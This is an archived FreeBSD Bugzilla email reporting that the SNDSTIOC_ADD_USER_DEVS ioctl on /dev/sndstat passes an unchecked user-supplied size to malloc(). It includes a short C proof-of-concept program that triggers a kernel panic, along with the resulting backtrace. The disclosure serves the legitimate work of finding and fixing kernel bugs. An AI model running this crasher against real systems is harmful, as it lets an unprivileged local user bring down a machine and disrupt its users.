[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash

Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
Go to: [ bottom of page ] [ top of archives ] [ this month ]

From: <bugzilla-noreply_at_freebsd.org>
Date: Wed, 31 Aug 2022 20:30:49 UTC

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=266142

            Bug ID: 266142
           Summary: SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes
                    unchecked size from user to malloc() -> potential
                    crash
           Product: Base System
           Version: CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: rtm@lcs.mit.edu

User code specifies a 64-bit length to the SNDSTIOC_ADD_USER_DEVS
ioctl, which sndstat_add_user_devs() passes to
sndstat_unpack_user_nvlbuf() (as arg->nbytes), which is then passed as
the size to malloc(). One way this can go wrong is if the user passes
in (size_t)-1, which this line in malloc_large() turns into zero:

        size = roundup(size, PAGE_SIZE);

which either causes the MPASS(size > 0) in vmem_alloc() to fail,
or (if not INVARIANTS) causes a later kernel page fault.

A demo:

int main() {
  int fd = open("/dev/sndstat", 2);
  if(fd < 0) { perror("/dev/sndstat"); exit(1); }
  char buf[128];
  memset(buf, 0xff, sizeof(buf));
  ioctl(fd, 0xc0104466, buf); // SNDSTIOC_ADD_USER_DEVS
}

# uname -a
FreeBSD  14.0-CURRENT FreeBSD 14.0-CURRENT #71 main-n250928-b8170f38ccc7-dirty:
Wed Aug 31 16:05:23 EDT 2022    
rtm@xxx:/usr/obj/usr/rtm/symbsd/src/riscv.riscv64/sys/RTM riscv
# cc x.c
# ./a.out
panic: Fatal page fault at 0xffffffc00039b2be: 0x27fffd000809460
cpuid = 0
time = 1661976398
KDB: stack backtrace:
db_trace_self() at db_trace_self
db_trace_self_wrapper() at db_trace_self_wrapper+0x38
kdb_backtrace() at kdb_backtrace+0x2c
vpanic() at vpanic+0x170
panic() at panic+0x2a
page_fault_handler() at page_fault_handler+0x1d6
do_trap_supervisor() at do_trap_supervisor+0x76
cpu_exception_handler_supervisor() at cpu_exception_handler_supervisor+0x70
--- exception 13, tval = 0x27fffd000809460
vmem_alloc() at vmem_alloc+0x88
kmem_malloc_domain() at kmem_malloc_domain+0x6a
kmem_malloc_domainset() at kmem_malloc_domainset+0x36
malloc_large() at malloc_large+0x44
malloc() at malloc+0xf8
sndstat_unpack_user_nvlbuf() at sndstat_unpack_user_nvlbuf+0x26
sndstat_add_user_devs() at sndstat_add_user_devs+0x4a
sndstat_ioctl() at sndstat_ioctl+0xae
devfs_ioctl() at devfs_ioctl+0xbe
VOP_IOCTL_APV() at VOP_IOCTL_APV+0x30
VOP_IOCTL() at VOP_IOCTL+0x36
vn_ioctl() at vn_ioctl+0xba
fo_ioctl() at fo_ioctl+0xa
kern_ioctl() at kern_ioctl+0x242
sys_ioctl() at sys_ioctl+0x120
syscallenter() at syscallenter+0xec
ecall_handler() at ecall_handler+0x18
do_trap_user() at do_trap_user+0xea
cpu_exception_handler_user() at cpu_exception_handler_user+0x72
devfs_ioctl_f() at devfs_ioctl_f+0x20

-- 
You are receiving this mail because:
You are the assignee for the bug.